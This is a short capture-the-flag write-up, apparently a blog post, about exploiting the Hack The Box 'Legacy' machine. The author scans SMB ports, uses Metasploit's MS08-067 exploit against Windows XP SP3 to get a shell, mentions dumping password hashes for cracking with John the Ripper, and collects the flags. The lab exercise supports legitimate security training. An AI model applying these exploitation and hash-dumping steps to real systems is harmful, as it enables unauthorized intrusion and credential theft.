LEGACY ON HTB (EASY)

Jan 17, 2021

--

The IP ADDRESSES OF THE MACHINE ARE SHOWN IF YOU HOVER THE NAME OF THE MACHINE. 10.10.10.4 IS THE LEGACY MACHINE IP ADDRESS. WE SEE 139 AND 445 ARE OPEN SO WE CAN LOOK FOR SHARES IN THOSE

UNABLE TO GENERATE SHELL WITH SMBCLIENT

WENT TO METASPLOIT AND CHECKED OUT THE SMB VERSION.

ONCE WE FOUND OUT WHAT THE HOST WAS RUNNING. I ENDED UP GOOGLING “ WINDOWS XP SP3 EXPLOIT”

CLICKED THE FIRST LINK FOR RAPID7

FOUND AN EXPLOIT MS08_067. USE THIS EXPLOIT TO GAIN A SHELL

MAKE SURE THE LHOST IS THE VPN CONNECTION ESTABLISHED WITH THE VULNERABLE BOX. TUN0 OR TAP 0

WE ARE ABLE TO GENERATE SHELL

WE ARE ABLE TO FURTHER ENUMERATE WITH GETUID/SYSINFO/HELP

FROM HERE YOU COULD USE HASHDUMP TO GET THE HASHES OF THE PASSWORDS FOR THE SHOWN USERS. JOHN THE RIPPER WOULD BE A GOOD TOOL TO USE

POP A SHELL OR NAVIGATE THROUGH METERPRETER

NAVIGATE THROUGH THE SHELL FOR THE USER/ROOT FLAG

FOUND THE USER FLAG UNDER “JOHN” LOCATED IN THE USER.TXT FILE ON THE DESKTOP

ADMIN FLAG FOUND IN THE DESKTOP ROOT.TXT FILE UNDER THE ADMINISTRATOR USER

COPY AND PASTE THE FLAG. CLICK THE FLAG ICON UNDER ACTIONS. MAKE SURE TO SELECT A DIFFICULTY WHEN PROVIDED OR U WILL GET AN ERROR

SAME THING WITH THE ADMIN FLAG.

In this box we scanned the 10.10.10.4 network and found smb ports 139/445 were open. Once we saw we did’nt have access with smbclient we did further enumeration with metasploit scanner. We discovered the device was running Windows XP SP3 and googled the exploit for a shell.

Allen

Written by Allen

eJPT | Sec+ | Cyber Security Enthusiast. I plan on obtaining the ecpptv2 and OSCP in 2021. Just documenting my experience of becoming a pentester along the way.

Help
Status
About
Careers
Blog
Privacy
Terms
Text to speech
Teams